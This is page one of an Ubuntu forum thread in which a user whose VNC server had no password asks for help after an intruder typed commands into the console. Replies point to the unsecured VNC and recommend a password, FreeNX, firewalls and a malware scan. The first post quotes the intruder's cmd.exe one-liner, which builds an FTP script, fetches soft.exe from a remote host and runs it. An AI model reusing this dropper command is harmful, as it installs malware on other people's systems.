Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: I think i got hacked! :S

  1. #1
    Join Date
    Aug 2006
    Location
    Mandurah, W. Australia
    Beans
    210

    I think i got hacked! :S

    Code:
    %systemroot%\system32\cmd.exe
    cmd /c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik &echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe &exit
    
    %systemroot%\system32\cmd.exe
    cmd /c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik &echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe &exit
    Got hell freaked out.

    My machine started beeping like hell... then i look at it and it's typing stuff into my console!!!

    I had VNC open with no password, but no ports are forwarded and i need to use VNC on my network. What should i do? Change my VNC password? How could they get in with no ports forwarded?

    Proudly ubuntu since '05
    CPU: i5-4210U 1.7Ghz | RAM: 16GB 1600Mhz DDR3L SODIMM | GFX: nVidia GeForce 635M
    Distro: Ubuntu 19.04 64-Bit

  2. #2
    Join Date
    Dec 2007
    Beans
    1,042
    Distro
    Ubuntu Karmic Koala (testing)

    Re: I think i got hacked! :S

    Looks like someone is trying to execute Windows shellcode on your system.

    On Ubuntu, you aren't in any danger from that, but I suggest disconnecting VNC ASAP.
    He that would make his own liberty secure must guard even his enemy from oppression; for if he violates this duty he establishes a precedent that will reach to himself.
    -Thomas Paine

  3. #3
    Join Date
    Aug 2006
    Location
    Mandurah, W. Australia
    Beans
    210

    Re: I think i got hacked! :S

    Also, is there a chance that my windows machines may have been affected?
    Proudly ubuntu since '05
    CPU: i5-4210U 1.7Ghz | RAM: 16GB 1600Mhz DDR3L SODIMM | GFX: nVidia GeForce 635M
    Distro: Ubuntu 19.04 64-Bit

  4. #4
    Join Date
    Jan 2009
    Beans
    367

    Re: I think i got hacked! :S

    soft.exe is malware. Do you have a windows machine in your network? Its probably infected by this malware and it tried to spread to your ubuntu machine.

    maxiBoy: I dont see any shellcode?

  5. #5
    Join Date
    Aug 2006
    Location
    Mandurah, W. Australia
    Beans
    210

    Re: I think i got hacked! :S

    I have a home PC, which is pretty much used 24/7 but doesnt have VNC... my other server does tho.
    Proudly ubuntu since '05
    CPU: i5-4210U 1.7Ghz | RAM: 16GB 1600Mhz DDR3L SODIMM | GFX: nVidia GeForce 635M
    Distro: Ubuntu 19.04 64-Bit

  6. #6
    Join Date
    Dec 2007
    Location
    The last place I look
    Beans
    Hidden!
    Distro
    Ubuntu 10.04 Lucid Lynx

    Re: I think i got hacked! :S

    Quote Originally Posted by MaxIBoy View Post
    Looks like someone is trying to execute Windows shellcode on your system.

    On Ubuntu, you aren't in any danger from that, but I suggest disconnecting VNC ASAP.

    that it does. lol.

    if you need secure remote access look into freenx (ssh-based, easy setup and is a good protocol).
    https://help.ubuntu.com/community/FreeNX

  7. #7
    Join Date
    Aug 2006
    Location
    Mandurah, W. Australia
    Beans
    210

    Re: I think i got hacked! :S

    While i'm at it, is there an easy way to configure my firewall on the machine. ala GUI?
    Proudly ubuntu since '05
    CPU: i5-4210U 1.7Ghz | RAM: 16GB 1600Mhz DDR3L SODIMM | GFX: nVidia GeForce 635M
    Distro: Ubuntu 19.04 64-Bit

  8. #8
    Join Date
    Dec 2007
    Beans
    1,042
    Distro
    Ubuntu Karmic Koala (testing)

    Re: I think i got hacked! :S

    On your windows machine, all the firewalls in the world won't save you if you continue using unsecured VNC. Does your router have a firewall? It would be advisable to enable that instead (assuming the computers connected by VNC are both within the same LAN and behind the same router.) That possibly would secure you, since the entire VNC is behind a firewall. But no guarantees, you should use a password on VNC from now on anyway.

    On the windows machine, you should download this free tool and run a full check. This tool is really great, I've used it on horribly screwed up school computers before, to get them back on their feet. No substitute for a full antivirus program but it's good for catching "that bug going around."



    Quote Originally Posted by Copernicus1234 View Post
    soft.exe is malware. Do you have a windows machine in your network? Its probably infected by this malware and it tried to spread to your ubuntu machine.

    maxiBoy: I dont see any shellcode?
    Doesn't shellcode just mean "code that runs under the CLI shell?" In this case cmd.exe.
    Last edited by MaxIBoy; August 19th, 2009 at 10:09 PM.
    He that would make his own liberty secure must guard even his enemy from oppression; for if he violates this duty he establishes a precedent that will reach to himself.
    -Thomas Paine

  9. #9
    Join Date
    Aug 2006
    Location
    Mandurah, W. Australia
    Beans
    210

    Re: I think i got hacked! :S

    Thanks Maxiboy, I used Malwarebytes at my old work (Service and Support), just never had any real experience with VNC!
    Proudly ubuntu since '05
    CPU: i5-4210U 1.7Ghz | RAM: 16GB 1600Mhz DDR3L SODIMM | GFX: nVidia GeForce 635M
    Distro: Ubuntu 19.04 64-Bit

  10. #10
    credobyte is offline Iced Blended Vanilla Crème Ubuntu
    Join Date
    Jun 2009
    Beans
    1,559
    Distro
    Ubuntu 9.04 Jaunty Jackalope

    Re: I think i got hacked! :S

    http://personalfirewall.comodo.com/ - haven't found a better one.

Page 1 of 2 12 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •